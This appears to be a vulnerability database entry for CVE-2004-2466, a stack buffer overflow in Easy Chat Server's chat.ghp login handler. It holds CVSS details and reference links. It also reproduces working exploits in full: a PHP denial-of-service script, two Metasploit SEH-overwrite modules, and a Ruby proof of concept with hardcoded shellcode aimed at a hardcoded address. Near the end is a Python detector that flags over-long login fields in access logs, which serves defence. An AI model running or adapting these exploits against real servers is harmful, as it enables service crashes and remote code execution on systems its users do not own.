CVE-2004-2466
CVSS 5.0
Published: 2004-12-31 00:00:00
Last modified: 2014-05-22 21:34:01

[Original] chat.ghp in Easy Chat Server 1.2 allows remote attackers to cause a denial of service (server crash) via a long username parameter, possibly due to a buffer overflow. NOTE: it was later reported that 2.2 is also affected.


[CNNVD] Easy Chat Server Denial of Service Vulnerability (CNNVD-200412-469)

        A vulnerability exists in chat.ghp in Easy Chat Server 1.2. Remote attackers can cause a denial of service (server crash) via an overly long username parameter; the flaw is possibly due to a buffer overflow.

- CVSS (Base Score)

CVSS score: 5 [Medium (MEDIUM)]
Confidentiality impact: NONE [No impact on system confidentiality]
Integrity impact: NONE [No impact on system integrity]
Availability impact: PARTIAL [May cause degraded performance or interrupted access to resources]
Access complexity: LOW [No access restrictions on exploitation]
Attack vector: NETWORK [Attacker does not need intranet or local access]
Authentication: NONE [No authentication required for exploitation]

- CWE (Weakness Category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (Affected Platforms and Products)

cpe:/a:efs_software:easy_chat_server:1.2
cpe:/a:efs_software:easy_chat_server:2.2

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2466
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2466
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-469
(Official data source) CNNVD

- Other Links and Resources

http://xforce.iss.net/xforce/xfdb/36013
(UNKNOWN)  XF  easychatserver-username-dos(36013)
http://xforce.iss.net/xforce/xfdb/16629
(UNKNOWN)  XF  easychat-chatghp-username-dos(16629)
http://www.vupen.com/english/advisories/2007/2901
(UNKNOWN)  VUPEN  ADV-2007-2901
http://www.securityfocus.com/bid/67384
(UNKNOWN)  BID  67384
http://www.securityfocus.com/bid/25328
(UNKNOWN)  BID  25328
http://www.osvdb.org/7416
(UNKNOWN)  OSVDB  7416
http://www.exploit-db.com/exploits/33326
(UNKNOWN)  EXPLOIT-DB  33326
http://www.autistici.org/fdonato/advisory/EasyChatServer1.2-adv.txt
(VENDOR_ADVISORY)  MISC  http://www.autistici.org/fdonato/advisory/EasyChatServer1.2-adv.txt
http://secunia.com/advisories/26461
(VENDOR_ADVISORY)  SECUNIA  26461
http://secunia.com/advisories/12006
(VENDOR_ADVISORY)  SECUNIA  12006
http://milw0rm.com/exploits/4289
(UNKNOWN)  MILW0RM  4289
http://archives.neohapsis.com/archives/fulldisclosure/2004-07/0077.html
(VENDOR_ADVISORY)  FULLDISC  20040702 Multiple Vulnerabilities in Easy Chat Server 1.2
http://archives.neohapsis.com/archives/bugtraq/2004-07/0013.html
(VENDOR_ADVISORY)  BUGTRAQ  20040702 Multiple Vulnerabilities in Easy Chat Server 1.2

- Vulnerability Information

Easy Chat Server Denial of Service Vulnerability
Medium severity  Buffer overflow
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote
        A vulnerability exists in chat.ghp in Easy Chat Server 1.2. Remote attackers can cause a denial of service (server crash) via an overly long username parameter; the flaw is possibly due to a buffer overflow.

- Advisories and Patches

        

- Vulnerability Information (4289)

Easy Chat Server 2.2 Remote Denial of Service Exploit (EDBID:4289)
windows dos
2007-08-14 Verified
0 NetJackal
<?php

##########################################################
###----------------------------------------------------###
###--------Easy Chat Server Remote DoS Exploit---------###
###----------------------------------------------------###
###-http://www.echatserver.com/------------------------###
###----------------------------------------------------###
###-Tested on version 2.2 [last version]-(XP SP2)------###
###----------------------------------------------------###
###-Usage:-php dos.php [TARGET] [PORT]-----------------###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################

/*
Description:
 Easy Chat Server has a built-in web server that lets users
 log in to the chat server. The login page allows a maximum of 30
 characters for Name & Password. If an attacker submits a long Name &
 Password by editing the page or crafting his own login page, the chat
 server will crash.
*/
echo "Easy Chat Server Remote DoS Exploit\n\t\t\t\tby NetJackal";
if($argc<2)die("\nUsage:   php dos.php [TARGET] [PORT]\nExample: php dos.php localhost 80\n");
$host=$argv[1];
$port=$argv[2];
$A=str_repeat('A',999);
echo "\nConnecting...";
$link=fsockopen($host,$port,$en,$es,30);
if(!$link)die("\n$en: $es");
echo "\nConnected!";
echo "\nSending exploit...";
fputs($link,"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\r\nHost: $host\r\n\r\n");
echo "\nWell done!\n";
?>

# milw0rm.com [2007-08-14]
		

- Vulnerability Information (16772)

EFS Easy Chat Server Authentication Request Handling Buffer Overflow (EDBID:16772)
windows remote
2010-08-06 Verified
80 metasploit
##
# $Id: efs_easychatserver_username.rb 9966 2010-08-06 20:12:51Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] }

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in EFS Software Easy Chat Server. By
				sending an overly long authentication request, an attacker may be able to execute
				arbitrary code.

				NOTE: The offset to SEH is influenced by the installation path of the program.
				The path, which defaults to "C:\Program Files\Easy Chat Server", is concatenated
				with "\users\" and the string passed as the username HTTP parameter.
			},
			'Author'         => [ 'LSO <lso[at]hushmail.com>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9966 $',
			'References'     =>
				[
					[ 'CVE', '2004-2466' ],
					[ 'OSVDB', '7416' ],
					[ 'BID', '25328' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0b\x0d\x20\x23\x25\x26\x2b\x2f\x3a\x3f\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Easy Chat Server 2.2', { 'Ret' => 0x1001b2b6 } ], # patrickw OK 20090302 w2k
				],
			'DisclosureDate' => 'Aug 14 2007',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('PATH', [ true, "Installation path of Easy Chat Server",
					"C:\\Program Files\\Easy Chat Server" ])
			], self.class )
	end

	def check
		info = http_fingerprint # check method
		# NOTE: Version 2.2 still reports "1.0" in the "Server" header
		if (info =~ /Easy Chat Server\/1\.0/)
			return Exploit::CheckCode::Appears
		end
		Exploit::CheckCode::Safe
	end

	def exploit
		# randomize some values.
		val = rand_text_alpha(rand(10) + 1)
		num = rand_text_numeric(1)

		path = datastore['PATH'] + "\\users\\"
		print_status("path: " + path)

		# exploit buffer.
		filler = rand_text_alpha(256 - path.length)
		seh    = generate_seh_payload(target.ret)
		juju = filler + seh

		uri = "/chat.ghp?username=#{juju}&password=#{val}&room=2&#sex=#{num}"

		print_status("Trying target #{target.name}...")

		send_request_raw({'uri' => uri}, 5)

		handler
		disconnect
	end

end
		

- Vulnerability Information (F85363)

Easy Chat Server 2.2 Buffer Overflow (PacketStormID:F85363)
2010-01-19 00:00:00
John Babio  
exploit,overflow
CVE-2004-2466

EFS Software Easy Chat Server version 2.2 buffer overflow exploit that launches calc.exe.

# Title: Exploit EFS Software Easy Chat Server v2.2 
# EDB-ID: 
# CVE-ID: 2004-2466
# OSVDB-ID: 7416
# Author: John Babio
# Published: 2010-01-17
# Tested on: [Windows XP Sp3 Eng]
# Download Exploit Code
# Download Vulnerable app (https://www.securinfos.info/old_softwares_vulnerable/Easy_Chat_Server_2.2.exe)

#!/usr/bin/ruby

require 'net/http'
require 'uri'
require 'socket'


jmp = "\xeb\x06\x90\x90"
ppr = "\xa2\xb9\01\x10" #SSLEAY32.dll pop ebx, pop ebp, ret

#win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com

shellcode = "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x86" +
"\x49\xae\x6a\x83\xeb\xfc\xe2\xf4\x7a\xa1\xea\x6a\x86\x49\x25\x2f" +
"\xba\xc2\xd2\x6f\xfe\x48\x41\xe1\xc9\x51\x25\x35\xa6\x48\x45\x23" +
"\x0d\x7d\x25\x6b\x68\x78\x6e\xf3\x2a\xcd\x6e\x1e\x81\x88\x64\x67" +
"\x87\x8b\x45\x9e\xbd\x1d\x8a\x6e\xf3\xac\x25\x35\xa2\x48\x45\x0c" +
"\x0d\x45\xe5\xe1\xd9\x55\xaf\x81\x0d\x55\x25\x6b\x6d\xc0\xf2\x4e" +
"\x82\x8a\x9f\xaa\xe2\xc2\xee\x5a\x03\x89\xd6\x66\x0d\x09\xa2\xe1" +
"\xf6\x55\x03\xe1\xee\x41\x45\x63\x0d\xc9\x1e\x6a\x86\x49\x25\x02" +
"\xba\x16\x9f\x9c\xe6\x1f\x27\x92\x05\x89\xd5\x3a\xee\xb9\x24\x6e" +
"\xd9\x21\x36\x94\x0c\x47\xf9\x95\x61\x2a\xcf\x06\xe5\x49\xae\x6a" 

buffer = "\x41" * 216 + jmp + ppr + shellcode

url = URI.parse('http://10.10.99.12')
res = Net::HTTP.start(url.host, url.port) {|http|
http.get('/chat.ghp?username=' +buffer+ '&password=' +buffer+ '&room=1&sex=2')
}
puts res.body


- Vulnerability Information (F83219)

EFS Easy Chat Server Authentication Request Handling Buffer Overflow (PacketStormID:F83219)
2009-11-26 00:00:00
LSO  metasploit.com
exploit,overflow,arbitrary
CVE-2004-2466

This Metasploit module exploits a stack overflow in EFS Software Easy Chat Server. By sending an overly long authentication request, an attacker may be able to execute arbitrary code.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in EFS Software Easy Chat Server. By
				sending an overly long authentication request, an attacker may be able to execute
				arbitrary code.
			},
			'Author'         => [ 'LSO <lso[@]hushmail.com>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-2466' ],
					[ 'OSVDB', '7416' ],
					[ 'BID', '25328' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Easy Chat Server 2.2', { 'Ret' => 0x1001b2b6 } ], # patrickw OK 20090302 w2k
				],
			'DisclosureDate' => 'Aug 14 2007',
			'DefaultTarget'  => 0))
			
			register_options( [ Opt::RPORT(80) ], self.class )
	end

	def check
		res = send_request_raw
			
			if res and res['Server'] =~ /Easy Chat Server\/1.0/
				return Exploit::CheckCode::Appears
			end

			return Exploit::CheckCode::Safe
	end

	def exploit
		# randomize some values.
		val = rand_text_alpha(rand(10) + 1)
		num = rand_text_numeric(1)

		# exploit buffer.
		filler = rand_text_alpha(216)
		seh    = generate_seh_payload(target.ret)
		juju = filler + seh

		uri = "/chat.ghp?username=#{juju}&password=#{val}&room=2&#{val}=#{num}"

		print_status("Trying target #{target.name}...")

		send_request_raw({'uri' => uri}, 5)

		handler
		disconnect
	end

end


- Vulnerability Information

7416
Easy Chat Server chat.ghp Long Username Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Public

- Vulnerability Description

Easy Chat Server contains a flaw that may allow a remote denial of service. The issue is triggered when a GET request is sent with a very long username, and will result in loss of availability for the service.
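As an added detection example (not code from the page, the advisories or the exploit authors), the following Python scans constructed web-server access-log lines for the trigger described above: a GET to chat.ghp whose username or password field exceeds the 30-character limit the login page is said to enforce. The Common Log Format, the sample entries and the use of that 30-character limit as an alert threshold are assumptions.

```python
# Added example; not from the page, the advisories or the exploit authors.
# Flags GET requests to chat.ghp whose username/password exceeds the 30-character
# limit described for the login page. Log lines below are constructed samples.
import re
from urllib.parse import parse_qs, urlsplit

LOGIN_FIELD_MAX = 30                       # limit stated in the advisory text
WATCHED_PARAMS = ("username", "password")  # fields the public PoCs overfill

# Common Log Format (assumed): client ident user [ts] "METHOD target HTTP/x" status size
_CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def inspect_request(target):
    """Return [(param, length), ...] for over-long login fields sent to chat.ghp, else []."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/chat.ghp"):
        return []                          # other paths are out of scope
    # keep_blank_values so an empty field still counts as present
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    for name in WATCHED_PARAMS:
        for value in query.get(name, []):
            if len(value) > LOGIN_FIELD_MAX:
                hits.append((name, len(value)))
    return hits

def scan_log(lines):
    """Return one alert dict per log line carrying an over-long chat.ghp login field."""
    alerts = []
    for line in lines:
        m = _CLF.match(line)
        if not m:
            continue                       # not a CLF line; skip rather than crash
        hits = inspect_request(m.group("target"))
        if hits:
            alerts.append({"ip": m.group("ip"), "ts": m.group("ts"),
                           "status": m.group("status"), "params": hits})
    return alerts

# Constructed sample log: a normal login, the 999-byte pattern seen in the public
# PoC, and a long parameter on an unrelated path (must not alert).
SAMPLE_LOG = [
    '192.0.2.7 - - [14/Aug/2007:10:01:02 +0000] "GET /chat.ghp?username=alice&password=pw&room=1&sex=2 HTTP/1.1" 200 512',
    '192.0.2.10 - - [14/Aug/2007:10:01:09 +0000] "GET /chat.ghp?username=' + "A" * 999 + "&password=" + "A" * 999 + '&room=1&sex=2 HTTP/1.1" 200 0',
    '192.0.2.11 - - [14/Aug/2007:10:02:00 +0000] "GET /index.html?username=' + "B" * 200 + ' HTTP/1.1" 404 0',
]
```

Running `scan_log(SAMPLE_LOG)` yields a single alert for 192.0.2.10 naming both over-long fields; a status of 200 with zero bytes returned on such a request is consistent with the server crashing mid-response, which is worth correlating with service restarts.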

- Timeline

2004-07-02 Unknown
2004-07-02 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related References

- Vulnerability Author
